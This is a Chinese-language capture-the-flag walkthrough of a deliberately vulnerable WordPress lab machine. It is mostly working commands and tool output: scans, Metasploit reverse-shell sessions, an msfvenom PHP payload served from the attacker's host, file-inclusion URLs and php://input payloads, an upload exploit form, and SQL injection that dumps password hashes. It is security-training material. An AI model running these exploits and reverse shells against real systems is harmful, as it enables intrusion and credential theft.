信息收集
➜ ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 22:08 CST
Nmap scan report for 192.168.116.1
Host is up (0.0025s latency).
Nmap scan report for 192.168.116.138
Host is up (0.00072s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.94 seconds
➜ ~ nmap -A -T4 192.168.116.138 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 22:09 CST
Nmap scan report for 192.168.116.138
Host is up (0.0039s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds
➜ ~
- IP为:192.168.116.138,只开放了一个80端口,主页还是Apache2的默认页。
- 先扫目录,-r不递归扫
➜ ~ dirb http://192.168.116.138 -r
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Sep 25 22:17:39 2019
URL_BASE: http://192.168.116.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.116.138/ ----
+ http://192.168.116.138/index.html (CODE:200|SIZE:10918)
+ http://192.168.116.138/info.php (CODE:200|SIZE:15)
==> DIRECTORY: http://192.168.116.138/javascript/
+ http://192.168.116.138/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.116.138/wordpress/
-----------------
END_TIME: Wed Sep 25 22:17:42 2019
DOWNLOADED: 4612 - FOUND: 3
➜ ~
- 发现了一个info.php,又是WordPress。
➜ ~ curl "http://192.168.116.138/info.php"
192.168.116.138% ➜ ~
- 访问info.php返回了服务器端的IP地址,那再扫WordPress
➜ ~ wpscan --url http://192.168.116.138/wordpress/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.116.138/wordpress/
[+] Started: Wed Sep 25 22:23:22 2019
Interesting Finding(s):
[+] http://192.168.116.138/wordpress/
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.116.138/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.116.138/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.116.138/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.116.138/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.3 identified (Latest, released on 2019-09-05).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.116.138/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
| - http://192.168.116.138/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
[+] WordPress theme in use: twentysixteen
| Location: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/
| Latest Version: 2.0 (up to date)
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/readme.txt
| Style URL: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 2.0 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3, Match: 'Version: 2.0'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mail-masta
| Location: http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
| References:
| - https://wpvulndb.com/vulnerabilities/8609
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
| - https://www.exploit-db.com/exploits/40290/
| - https://cxsecurity.com/issue/WLB-2016080220
|
| [!] Title: Mail Masta 1.0 - Multiple SQL Injection
| References:
| - https://wpvulndb.com/vulnerabilities/8740
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6570
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6571
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6572
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6573
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6574
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6575
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6576
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6577
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6578
| - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
|
| Version: 1.0 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/readme.txt
[+] reflex-gallery
| Location: http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/
| Last Updated: 2019-05-10T16:05:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
| Fixed in: 3.1.4
| References:
| - https://wpvulndb.com/vulnerabilities/7867
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133
| - https://www.exploit-db.com/exploits/36374/
| - https://packetstormsecurity.com/files/130845/
| - https://packetstormsecurity.com/files/131515/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
|
| [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
| Fixed in: 3.1.5
| References:
| - https://wpvulndb.com/vulnerabilities/7985
| - https://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto
| - https://github.com/scaron/prettyphoto/issues/149
| - https://github.com/wpscanteam/wpscan/issues/818
|
| Version: 3.1.3 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/readme.txt
[+] site-editor
| Location: http://192.168.116.138/wordpress/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
| References:
| - https://wpvulndb.com/vulnerabilities/9044
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
| - http://seclists.org/fulldisclosure/2018/Mar/40
| - https://github.com/SiteEditor/editor/issues/2
|
| Version: 1.1.1 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/site-editor/readme.txt
[+] slideshow-gallery
| Location: http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/
| Last Updated: 2019-07-12T13:09:00.000Z
| [!] The version is out of date, the latest version is 1.6.12
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 5 vulnerabilities identified:
|
| [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
| Fixed in: 1.4.7
| References:
| - https://wpvulndb.com/vulnerabilities/7532
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
| - https://www.exploit-db.com/exploits/34681/
| - https://www.exploit-db.com/exploits/34514/
| - http://seclists.org/bugtraq/2014/Sep/1
| - https://packetstormsecurity.com/files/131526/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
|
| [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
| Fixed in: 1.5.3.4
| References:
| - https://wpvulndb.com/vulnerabilities/8263
| - http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
| - http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
|
| [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
| Fixed in: 1.6.5
| References:
| - https://wpvulndb.com/vulnerabilities/8786
| - https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html
| - https://plugins.trac.wordpress.org/changeset/1609730/slideshow-gallery
|
| [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
| Fixed in: 1.6.6
| References:
| - https://wpvulndb.com/vulnerabilities/8795
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17946
| - http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf
| - https://packetstormsecurity.com/files/142079/DC-2017-01-014.pdf
|
| [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
| Fixed in: 1.6.9
| References:
| - https://wpvulndb.com/vulnerabilities/9354
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18017
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18018
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18019
| - https://plugins.trac.wordpress.org/changeset?reponame=&new=1974812%40slideshow-gallery&old=1907382%40slideshow-gallery
| - https://ansawaf.blogspot.com/2019/04/xss-and-sqli-in-slideshow-gallery.html
|
| Version: 1.4.6 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/readme.txt
[+] wp-easycart-data
| Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-easycart-data/
|
| Detected By: Urls In Homepage (Passive Detection)
|
| The version could not be determined.
[+] wp-support-plus-responsive-ticket-system
| Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: WP Support Plus Responsive Ticket System <= 7.1.3 – Authenticated SQL Injection
| Fixed in: 8.0.0
| References:
| - https://wpvulndb.com/vulnerabilities/8699
| - https://www.exploit-db.com/exploits/40939/
| - http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
| - https://plugins.trac.wordpress.org/changeset/1556644/wp-support-plus-responsive-ticket-system
|
| [!] Title: WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution (RCE)
| Fixed in: 8.0.8
| References:
| - https://wpvulndb.com/vulnerabilities/8949
| - https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
|
| [!] Title: WP Support Plus Responsive Ticket System <= 9.0.2 - Multiple Authenticated SQL Injection
| Fixed in: 9.0.3
| References:
| - https://wpvulndb.com/vulnerabilities/9041
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000131
| - https://github.com/00theway/exp/blob/master/wordpress/wpsupportplus.md
| - https://plugins.trac.wordpress.org/changeset/1814103/wp-support-plus-responsive-ticket-system
|
| [!] Title: WP Support Plus Responsive Ticket System <= 9.1.1 - Stored XSS
| Fixed in: 9.1.2
| References:
| - https://wpvulndb.com/vulnerabilities/9235
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7299
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15331
| - https://cert.kalasag.com.ph/news/research/cve-2019-7299-stored-xss-in-wp-support-plus-responsive-ticket-system/
| - https://plugins.trac.wordpress.org/changeset/2024484/wp-support-plus-responsive-ticket-system
|
| Version: 7.1.3 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
[+] wp-symposium
| Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-symposium/
| Last Updated: 2015-08-21T12:36:00.000Z
| [!] The version is out of date, the latest version is 15.8.1
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 7 vulnerabilities identified:
|
| [!] Title: WP Symposium 13.04 - Unvalidated Redirect
| References:
| - https://wpvulndb.com/vulnerabilities/6383
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2694
|
| [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
| Reference: https://wpvulndb.com/vulnerabilities/6390
|
| [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
| References:
| - https://wpvulndb.com/vulnerabilities/7716
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10021
| - https://www.exploit-db.com/exploits/35543/
| - https://www.exploit-db.com/exploits/35778/
| - http://www.homelab.it/index.php/2014/12/11/wordpress-wp-symposium-shell-upload/
| - https://www.youtube.com/watch?v=pF8lIuLT6Vs
| - http://blog.sucuri.net/2014/12/wp-symposium-zero-day-vulnerability-dangers.html
| - https://packetstormsecurity.com/files/129884/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
|
| [!] Title: WP Symposium <= 15.1 - SQL Injection
| Fixed in: 15.4
| References:
| - https://wpvulndb.com/vulnerabilities/7902
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
| - https://www.exploit-db.com/exploits/37080/
| - http://web.archive.org/web/20150718010246/http://permalink.gmane.org/gmane.comp.security.oss.general/16479
| - https://packetstormsecurity.com/files/131801/
|
| [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
| Fixed in: 15.8
| References:
| - https://wpvulndb.com/vulnerabilities/8140
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
| - https://www.exploit-db.com/exploits/37824/
| - https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
|
| [!] Title: WP Symposium <= 15.1 - Blind SQL Injection
| Fixed in: 15.8
| References:
| - https://wpvulndb.com/vulnerabilities/8148
| - https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
|
| [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
| References:
| - https://wpvulndb.com/vulnerabilities/8175
| - http://cxsecurity.com/issue/WLB-2015090024
|
| Version: 15.1 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/wp-symposium/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Finished: Wed Sep 25 22:23:25 2019
[+] Requests Done: 78
[+] Cached Requests: 5
[+] Data Sent: 23.706 KB
[+] Data Received: 17.527 MB
[+] Memory used: 207.039 MB
[+] Elapsed time: 00:00:03
➜ ~
- 这次还真扫出来可以利用的漏洞了,文件包含,SQL注入,文件上传,RCE都有。
- SQL注入的:
https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin-SQL-Injection-Vulnerability
https://ansawaf.blogspot.com/2019/04/xss-and-sqli-in-slideshow-gallery.html
https://www.exploit-db.com/exploits/40939/
https://www.exploit-db.com/exploits/40290/
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
https://www.exploit-db.com/exploits/36374/
https://www.exploit-db.com/exploits/34681/
https://www.exploit-db.com/exploits/34514/
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
- 利用链接,rapid7的在MSF里都可以直接利用,exp-db要手动测试。
➜ ~ wpscan --enumerate p --url http://192.168.116.138/wordpress/ |grep exp
| - https://www.exploit-db.com/exploits/40290/
| - https://www.exploit-db.com/exploits/36374/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
| - https://www.exploit-db.com/exploits/34681/
| - https://www.exploit-db.com/exploits/34514/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
| - https://www.exploit-db.com/exploits/40939/
| - https://github.com/00theway/exp/blob/master/wordpress/wpsupportplus.md
| - https://www.exploit-db.com/exploits/35543/
| - https://www.exploit-db.com/exploits/35778/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
| - https://www.exploit-db.com/exploits/37080/
| - https://www.exploit-db.com/exploits/37824/
➜ ~
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > show options
Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.138 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.116.1 yes The listen address (an interface may be specified)
LPORT 7788 yes The listen port
Exploit target:
Id Name
-- ----
0 Reflex Gallery 3.1.3
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) >
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > run
[*] Started reverse TCP handler on 192.168.116.1:7788
[+] Our payload is at: QkwaQFsdu.php. Calling payload...
[*] Calling payload...
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 1 opened (192.168.116.1:7788 -> 192.168.116.138:41290) at 2019-09-26 10:28:04 +0800
[+] Deleted QkwaQFsdu.php
meterpreter >
SQL注入
msf5 exploit(unix/webapp/wp_symposium_shell_upload) > use auxiliary/admin/http/wp_symposium_sql_injection
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > show options
Module options (auxiliary/admin/http/wp_symposium_sql_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
URI_PLUGIN wp-symposium yes The WordPress Symposium Plugin URI
VHOST no HTTP server virtual host
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > set rhosts 192.168.116.138
rhosts => 192.168.116.138
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > set targeturi /wordpress
targeturi => /wordpress
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > run
[*] Running module against 192.168.116.138
[+] 192.168.116.138:80 - admin $P$BYWgfD7pa572QS9YFoeVVmhrIhBAx0. [email protected]
[+] 192.168.116.138:80 -
[+] 192.168.116.138:80 - aarti $P$BHyn.q5e5/HG9/UT/Ow3xkH2xXsikx0 [email protected]
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_symposium_sql_injection) >
- SQL注入获取到了密码,但是加密了,john爆破无果。
- 回去看第一个session,切换到home目录找到第一个flag。
meterpreter > cd raj
meterpreter > ls
Listing: /home/raj
==================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 4770 fil 2019-09-11 12:54:51 +0800 .ICEauthority
100600/rw------- 232 fil 2019-09-11 12:57:45 +0800 .bash_history
100644/rw-r--r-- 220 fil 2019-09-09 14:15:07 +0800 .bash_logout
100644/rw-r--r-- 3771 fil 2019-09-09 14:15:07 +0800 .bashrc
40700/rwx------ 4096 dir 2019-09-09 23:47:31 +0800 .cache
40700/rwx------ 4096 dir 2019-09-09 21:20:39 +0800 .config
40700/rwx------ 4096 dir 2019-09-09 21:20:05 +0800 .dbus
40700/rwx------ 4096 dir 2019-09-09 15:51:12 +0800 .gnupg
40700/rwx------ 4096 dir 2019-09-09 21:20:06 +0800 .gvfs
40700/rwx------ 4096 dir 2019-09-09 14:20:30 +0800 .local
40700/rwx------ 4096 dir 2019-09-09 14:34:23 +0800 .mozilla
100600/rw------- 39 fil 2019-09-09 15:23:00 +0800 .mysql_history
100644/rw-r--r-- 807 fil 2019-09-09 14:15:07 +0800 .profile
40700/rwx------ 4096 dir 2019-09-09 15:51:12 +0800 .ssh
100644/rw-r--r-- 0 fil 2019-09-09 14:21:21 +0800 .sudo_as_admin_successful
40755/rwxr-xr-x 4096 dir 2019-09-10 00:23:02 +0800 Desktop
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Documents
40755/rwxr-xr-x 4096 dir 2019-09-09 16:23:53 +0800 Downloads
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Music
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Pictures
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Public
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Templates
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Videos
100644/rw-r--r-- 8980 fil 2019-09-09 14:15:07 +0800 examples.desktop
100644/rw-r--r-- 41 fil 2019-09-10 12:06:56 +0800 flag1.txt
40755/rwxr-xr-x 4096 dir 2019-09-09 16:18:54 +0800 plugin
meterpreter > cat flag1.txt
aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu
meterpreter >
➜ VulnHub echo "aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu" |base64 -d
https://www.hackingarticles.in%
- 在网站的跟目录发现了一个notes.txt文件和一个加密了的zip压缩包
www-data@ubuntu:/var/www/html$ ls
ls
index.html info.php notes.txt secret.zip wordpress
www-data@ubuntu:/var/www/html$ cat notes.txt
cat notes.txt
You Need to ZIP Your Wayout
www-data@ubuntu:/var/www/html$ cat info.php
cat info.php
<?php
echo $_SERVER['HTTP_HOST'];
?>
www-data@ubuntu:/var/www/html$
- 密码是上面SQL注入获取到admin密码的Hash
➜ VulnHub unzip secret.zip
Archive: secret.zip
[secret.zip] link.txt password:
inflating: link.txt
➜ VulnHub cat link.txt
https://www.exploit-db.com/exploits/38861
https://www.exploit-db.com/exploits/40290
https://www.exploit-db.com/exploits/36374
https://www.exploit-db.com/exploits/37824
https://www.exploit-db.com/exploits/41006%
➜ VulnHub
- 发现是一堆链接,好像就是我用wpscan扫出来的那些,所以好像没有什么作用,结合notes.txt提示,只是告诉你可以使用多种方法获取Shell。
CVE-2015-8351 远程文件包含
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 2333
lport => 2333
msf5 exploit(multi/handler) > set lhost 192.168.116.1
lhost => 192.168.116.1
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.116.1 yes The listen address (an interface may be specified)
LPORT 2333 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.116.1:2333
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 1 opened (192.168.116.1:2333 -> 192.168.116.138:42968) at 2019-09-26 11:45:39 +0800
meterpreter >
- 搭建http,把shell改名为wp-load.php,启动http服务。
➜ VulnHub msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
Saved as: shell.php
➜ VulnHub python3.7 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.116.138 - - [26/Sep/2019 11:45:11] code 404, message File not found
192.168.116.138 - - [26/Sep/2019 11:45:11] "GET /shell.phpwp-load.php HTTP/1.0" 404 -
^C
Keyboard interrupt received, exiting.
➜ VulnHub
➜ VulnHub cp shell.php wp-load.php
➜ VulnHub python3.7 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.116.138 - - [26/Sep/2019 11:45:39] "GET /wp-load.php HTTP/1.0" 200 -
- 访问
http://192.168.116.138/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.116.1:8000/,获取会话成功。
本地文件包含
- 敏感信息:
/etc/apache2/.htpasswd
- 描述上说是本地文件包含,但是我测的时候可以远程文件包含,所以也获取命令执行更简单了。
- 访问
http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.116.1:8000/shell.php就可以获取远程会话了。
- 本地包含的思路有上传有恶意php代码的文件,找到上传路径,然后包含获取会话。
- 然后可以包含日志文件可以想办法将一句话存进日志中,一般有Apache的访问日志,ssh链接的失败日志,这主要看服务器开放了哪些服务。但是这台就有点坑,只开了一个Apache,还读不了日志。
- 但是还是有办法的,还有php支持的各种协议。
http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=data://text/plain;base64,PD9waHAgIHBocGluZm8oKTs/Pg==
➜ ~ curl "http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://input" -d "<?php phpinfo();?>"
https, ftps, compress.zlib, php, file, glob, data, http, ftp, compress.bzip2, phar, zip
文件上传
- https://www.exploit-db.com/exploits/36374
- exp里要改的有主机和端口,年份月分也改一个存在的目录。
<form method="POST" action="http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2019&Month=09" enctype="multipart/form-data" >
<input type="file" name="qqfile"><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
- 浏览器打开,选择木马上传,打开上传目录访问木马,就可以了。
CSRF越权
- https://www.exploit-db.com/exploits/41006
- 登录后在垃圾桶找到一篇文章,里面有他的密码。
Admin Password: Ignite@123
- 在Aarti用户的详情里找到了Root密码
Ignite@123和第二个flag。
Second Flag: 5DD1CC591CE1569A528E3BCF18CEEB5B
RootPassword: SWduaXRlQDEyMw==
插件认证文件上传
- 上面有一个利用要用到密码,我都拿到密码了,我还要用exp?
msf5 exploit(unix/webapp/wp_slideshowgallery_upload) > show options
Module options (exploit/unix/webapp/wp_slideshowgallery_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.138 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
VHOST no HTTP server virtual host
WP_PASSWORD Ignite@123 yes Valid password for the provided username
WP_USER admin yes A valid username
Exploit target:
Id Name
-- ----
0 WP SlideShow Gallery 1.4.6
